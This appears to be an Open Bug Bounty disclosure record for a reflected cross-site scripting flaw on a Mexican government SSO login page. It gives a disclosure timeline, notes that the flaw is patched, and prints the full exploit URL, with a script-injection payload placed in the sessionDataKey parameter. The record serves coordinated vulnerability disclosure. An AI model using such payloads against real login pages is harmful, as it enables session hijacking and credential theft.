scsso.fone.sep.gob.mx XSS vulnerability

2017-01-06T15:33:00
ID OBB:203630
Type openbugbounty
Reporter Spam404
Modified 2017-04-03T06:13:00

Description

Vulnerable URL:
https://www.scsso.fone.sep.gob.mx/authenticationendpoint/login.do?SAMLRequest=jZNBb9swDIXv+xWC7nEcp0UWIXaRpehmoNu8xO1hl0FxmFaALHkinbr/fpLjrDkUQa8S+d7jJ2px09WaHcChsiblkyjmDExld8o8pfyhvBt95jfZpwXKWjdi2dKzWcPfFpDYEhEc+baVNdjW4DbgDqqCh/V9yp+JGhTjca0a60jqaG8NRAhN9GS3Ud2NOVsSObVtCY793nAQyM0OOp8lmc6Tq+v51ZyzO+sq6N1TvpcagbP8NuU+bI6FRFQHeLtAbL0GkjSU8iSeXI/i+WgSl/FUTGdimkTz2ew3Z4WzZCurvyhznLZ1RliJCoWRNaCgSmyW3+9FEsVieyxC8a0si1Hxc1Ny9niilgRqnqNB0XO6LNUMvjwbqPaB3ccF5Ak8z0J1EiHar04qjX9qVfS4F+Nz6ZPRDy+V3xZWq+qVLbW2LysHkjw6ci30lGtJl83DidqN9n2paAICJDDE2aYI+r9aqdVegUt5HnLy8cl92BvY9e/oH52gI7aydSOdwsAROlnRgEWcV620n3kN+zNGH0Z0sawSVZD2x2GLXqzbha2AyqcsnTQYlvfI8t082Ynzu7P9vz3/Ntk/&issuer;=saml2.ssoGrails_miPortal&sessionDataKey;=a121acee-7e59-4b39-9830-e1bd487f4620%27%22--!%3E%3CScript%20/K/%3Econfirm`OPENBUGBOUNTY`%3C/script%20/K/%3E&type;=samlsso&commonAuthCallerPath;=..%2F..%2Fsamlsso&forceAuthenticate;=true
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check scsso.fone.sep.gob.mx SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 January, 2017 15:33 GMT
Vulnerability existence verified and confirmed| 9 January, 2017 06:05 GMT
Vulnerability details disclosed by researcher| 3 April, 2017 06:13 GMT